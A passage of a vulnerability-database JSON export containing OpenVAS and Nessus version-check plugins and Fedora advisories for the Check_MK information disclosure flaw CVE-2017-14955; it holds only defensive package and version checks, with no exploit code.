(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140449\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-24 14:59:40 +0700 (Tue, 24 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-14955\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Check_MK Information Disclosure Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_check_mk_web_detect.nasl\");\n script_mandatory_keys(\"check_mk/detected\");\n\n 
script_tag(name:\"summary\", value:\"Check_MK is prone to a race condition vulnerability which could lead to\ninformation disclosure.\");\n\n script_tag(name:\"insight\", value:\"Check_MK mishandles certain errors within the failed-login save feature\nbecause of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI\ncrash report.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Check_MK before version 1.2.8p26.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.2.8p26 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/\");\n script_xref(name:\"URL\", value:\"https://mathias-kettner.de/check_mk_werks.php?werk_id=5208&HTML=yes\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"1.2.8p26\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"1.2.8p26\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-10-25T00:00:00", "id": "OPENVAS:1361412562310873524", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873524", "type": "openvas", "title": "Fedora Update for check-mk FEDORA-2017-9f36da1aac", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# 
$Id: gb_fedora_2017_9f36da1aac_check-mk_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for check-mk FEDORA-2017-9f36da1aac\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873524\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-25 15:35:33 +0200 (Wed, 25 Oct 2017)\");\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for check-mk FEDORA-2017-9f36da1aac\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'check-mk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"check-mk on Fedora 26\");\n 
script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9f36da1aac\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/J5JPRECHO3O5OIZBOXUWLAN24INBEBQF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"check-mk\", rpm:\"check-mk~1.2.8p26~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-10-25T00:00:00", "id": "OPENVAS:1361412562310873525", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873525", "type": "openvas", "title": "Fedora Update for check-mk FEDORA-2017-6bbb922009", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_6bbb922009_check-mk_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for check-mk FEDORA-2017-6bbb922009\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873525\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-25 15:35:40 +0200 (Wed, 25 Oct 2017)\");\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for check-mk FEDORA-2017-6bbb922009\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'check-mk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"check-mk on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-6bbb922009\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2R56VKACGVCXUW7WCE5KYLFDIDETE5WE\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"check-mk\", rpm:\"check-mk~1.2.8p26~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network components. It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-11T14:48:44", "published": "2017-10-11T14:48:44", "id": "FEDORA:681B26261E34", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: check-mk-1.2.8p26-1.fc27", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network components. 
It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-23T18:52:14", "published": "2017-10-23T18:52:14", "id": "FEDORA:1582D60A2936", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: check-mk-1.2.8p26-1.fc26", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1495", "CVE-2017-14955"], "description": "check-mk is a general purpose Nagios-plugin for retrieving data. It adopts a new approach for collecting data from operating systems and network components. It obsoletes NRPE, check_by_ssh, NSClient, and check_snmp and it has many benefits, the most important are a significant reduction of CPU usage on the Nagios host and an automatic inventory of items to be checked on hosts. ", "modified": "2017-10-23T22:52:46", "published": "2017-10-23T22:52:46", "id": "FEDORA:3EDF36095522", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: check-mk-1.2.8p26-1.fc25", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-07T10:11:38", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : check-mk (2017-79b7fd1b4d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2018-01-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:check-mk"], 
"id": "FEDORA_2017-79B7FD1B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/105908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-79b7fd1b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105908);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-79b7fd1b4d\");\n\n script_name(english:\"Fedora 27 : check-mk (2017-79b7fd1b4d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-79b7fd1b4d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"check-mk-1.2.8p26-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:11:30", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-24T00:00:00", "title": "Fedora 25 : check-mk (2017-6bbb922009)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2017-10-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:check-mk", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-6BBB922009.NASL", "href": "https://www.tenable.com/plugins/nessus/104111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-6bbb922009.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104111);\n 
script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-6bbb922009\");\n\n script_name(english:\"Fedora 25 : check-mk (2017-6bbb922009)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-6bbb922009\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"check-mk-1.2.8p26-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:12:36", "description": "Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-24T00:00:00", "title": "Fedora 26 : check-mk (2017-9f36da1aac)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14955", "CVE-2017-1495"], "modified": "2017-10-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:check-mk", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-9F36DA1AAC.NASL", "href": "https://www.tenable.com/plugins/nessus/104112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9f36da1aac.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104112);\n 
script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1495\", \"CVE-2017-14955\");\n script_xref(name:\"FEDORA\", value:\"2017-9f36da1aac\");\n\n script_name(english:\"Fedora 26 : check-mk (2017-9f36da1aac)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1495\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9f36da1aac\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected check-mk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:check-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"check-mk-1.2.8p26-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"check-mk\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}